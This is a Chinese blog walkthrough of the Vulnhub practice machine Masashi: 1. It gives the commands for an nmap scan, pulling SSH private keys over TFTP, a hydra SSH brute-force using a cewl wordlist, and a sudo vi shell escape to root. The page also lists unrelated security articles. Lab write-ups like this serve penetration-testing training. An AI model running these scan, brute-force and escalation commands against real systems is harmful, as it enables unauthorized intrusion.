Vulnhub: Masashi: 1靶机

最新推荐文章于 2024-08-30 18:45:00 发布
最新推荐文章于 2024-08-30 18:45:00 发布
阅读量356 收藏
点赞数
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132744541
版权
本文描述了使用KaliLinux进行网络信息收集,包括端口扫描、SNMP探测、TFTP访问和SSH爆破过程,最终实现从sv5用户提权到root。涉及的工具和技术包括Nmap、CEWL和Hydra。
摘要由CSDN通过智能技术生成

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

在这里插入图片描述

查看80端口的robots.txt提示三个文件

在这里插入图片描述

snmpwalk.txt内容,tftp服务在1337端口

在这里插入图片描述

sshfolder.txt内容,提示用户名sv5

在这里插入图片描述

tftp连接目标下载id_rsaid_rsa.pub

tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

在这里插入图片描述

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

在这里插入图片描述

提权

sv5用户sudo权限

在这里插入图片描述

提升为root

sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

在这里插入图片描述

在这里插入图片描述

flag

在这里插入图片描述

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Masashi: 1 vulnhub walkthrough
xdeclearn的博客
12-02 319
Masashi: 1 虚拟机信息:http://www.vulnhub.com/entry/masashi-1,599/ 0x01. 信息收集获取shell PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) tcp端口只开放了22和80,访问80为apache
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2880
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
Vulnhub内网渗透Masashi-1靶场通关
qq_35664104的博客
02-29 382
总体来说这个靶场非常简单,用到的知识点也非常少,都是常见的处理手法。
NeurIPS2019:新人与Bengio等大佬面对面交流,还颁发三项论文奖
喜欢打酱油的老鸟
12-18 459
2019-12-17 10:09:04 机器之心报道 机器之心编辑部 NeurIPS 2019 已经在温哥华接近尾声。作为人工智能和机器学习领域最顶级的盛会之一,本届大会参会总人数已经超过 13000 人,比去年增加了 50%。 在大会期间,一场面向 AI 新手的机器学习研讨会「New In ML 2019」也于当地时间 12 月 9 日 7 点至 17 点召开。这场研讨会由第四范式、 C...
图书排行:计算机书籍每周销量排行榜
老马的程序人生
05-27 4066
LSGO软件技术团队每周一,统计 京东网、当当网、互动出版社、中国图书网 关于计算机类书籍销量的 7日 排行数据,大家可参考这份排行来挑选技术书籍。 数据统计时间:2019/05/20 至 2019/05/26 京东网 Top01:Excel之光:高效工作的Excel完全手册 作 者:冯注龙,丘荣茂 著 出版社:电子工业出版社 Top02:PPT之光:三个维度打造完美PPT 作 者:冯注龙...
微软企业库(1):Enterprise Library 5.0介绍
weixin_34242819的博客
11-24 578
Microsoft Enterprise Library 5.0 – 2010四月 patterns & practices Developer Center 【1】摘要 PP小组2010年4月发布了企业库5.0,这是MSDN企业库5.0主页英文版的翻译。译者:Frank Xu Lei 微软企业库是一系列应用程序块的集合,目标是帮助开发人员来处...
最前沿・量子退火建模方法(1) : subQUBO讲解和python实现
gangshen1993的博客
04-13 3031
subQUBO思路和python实现。
Stable Diffusion系列(四):提示词规则与使用
羊城迷鹿的博客
01-28 2542
所谓提示词,也就是文生图中的文,由连贯的英语单词或句子组成。还是上面的例子,总共30步,前20灰发,后10蓝发。以DreamShaper8 SD1.5为例。前百分之30灰发,后百分之70蓝发。在此基础上,让眼睛变成黄蓝混合。前一半是蓝发,后一半去除蓝色。不是很好用,只有蓝色。
南京大学俞扬博士:强化学习前沿(下)
Hesy_H的博客
12-22 1150
转载自雷锋网 https://www.leiphone.com/news/201705/uO8nd09EnR77NBRP.html 在此列出俞扬老师讲课目录,以供读者参考:一、介绍(Introduction)二、马尔可夫决策过程(Markov De...
naruto-game:火影忍者RPG在线Android应用
05-17
原始字符和插图:copyright:Masashi Kishimoto版权所有:copyright:2002。 版权所有 贡献 欢迎对该存储库做出任何贡献。 在本地运行 先决条件 您的系统中应安装以下各项: git命令行工具( ...
members:会员介绍资料库
06-20
[账户名] .md(例如:masashi-sutou.md)用你喜欢的编辑器创建一个文件。 使用屏幕最右侧桌面上的克隆按钮将成员存储库复制到本地。 将创建的 .md 文件移动到成员并执行git add . git commit 。 在你可以git ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8433
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】服务基础第一阶段——第二节:Windows系统管理基础----虚拟化IP地址以及用户与组管理
goldfish8848的博客
08-25 1547
不同的用户身份拥有不同的权限,每个用户包含一个名称和一个密码,用户账户拥有唯一的安全标识Windows系统中,每个用户账户都有一个独特的安全标识符(SID,Security Identifier)它在系统内部用于控制对各种资源的访问权限。我们可以通过不同的方法查看用户的SID:1.使用命令提示符(CMD)这里的CMD就是我们常用的命令提示符(类似于终端的那个窗口),输入命令来查看当前登陆用户的SID如果需要查看特定用户的SID,可以使用命令。
网络安全售前入门06安全服务——基线检测服务方案
打工人
08-30 1004
安全基线检查可以帮助单位认清自身风险现状和漏洞隐患,使业务系统的风险维持在可控范围内。根本目的是保障业务系统的安全,是为了避免人为疏忽或错误,或使用默认的安全配置,给业务系统安全造成风险而制定的安全检查标准,并且采取必要的安全检查措施,使业务系统达到相对的安全指标要求。
网络安全网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
一定要站在自己热爱的生活里闪闪发光
08-27 386
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
08-30 857
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全】分析cookie实现PII IDOR
等风来
08-27 85
目标:公共电子商务类型的网站,每月有大约6万到10万访问者,注册用户大约有5万。
网络安全】XML-RPC漏洞之盲SSRF
等风来
08-27 308
我收到的响应是这样的,响应体中的状态为0,表示请求已成功发送:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值